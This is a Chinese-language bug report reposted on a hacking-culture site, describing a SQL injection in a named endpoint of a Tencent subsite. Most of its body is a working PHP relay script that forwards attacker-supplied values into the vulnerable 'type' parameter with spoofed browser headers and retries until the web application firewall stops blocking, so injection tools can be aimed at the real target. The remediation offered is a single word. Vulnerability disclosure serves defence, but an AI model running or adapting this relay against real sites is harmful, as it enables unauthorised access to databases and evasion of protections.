记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

腾讯某分站另一处SQL注入(附过waf转发脚本)

2015-08-10 18:55

http://gad.qq.com/config/GetConfigList



POST



parentId=0&type=1



两渗数都存在SQL注入



漏洞证明:

本地转发脚本

code 区域
<?php

error_reporting(0);

ini_set('max_execution_time', 0);

header("Content-Type: text/html; charset=UTF-8");



$a= urlencode(stripslashes($_GET['s']));

$a = str_replace('+',"%20",$a);

$data = "parentId=0&type=".$a;



do{

$output= request_by_other($data);



}

while($output=="" || strstr($output,"Implemented"));





echo $output;





function request_by_other($post_string)

{

$context = array(

'http' => array(

'method' => 'POST',

'header' => 'User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0' .

"\r\n".'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' .

"\r\n".'X-Requested-With: XMLHttpRequest'."\r\n".'Content-length:' . strlen($post_string),

'content' => $post_string)

);

$stream_context = stream_context_create($context);

$data = file_get_contents("http://gad.qq.com/config/GetConfigList", false, $stream_context);

$data = $http_response_header[0].$data;

return $data;

}



?>







1.png





2.png



修复方案:

过滤

知识来源: www.wooyun.org/bugs/wooyun-2015-0122960

阅读:91832 | 评论:0 | 标签:注入

想收藏或者和大家分享这篇好文章→复制链接地址

“腾讯某分站另一处SQL注入(附过waf转发脚本)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

学习黑客技术,传播黑客文化

推广

工具

标签云

本页关键词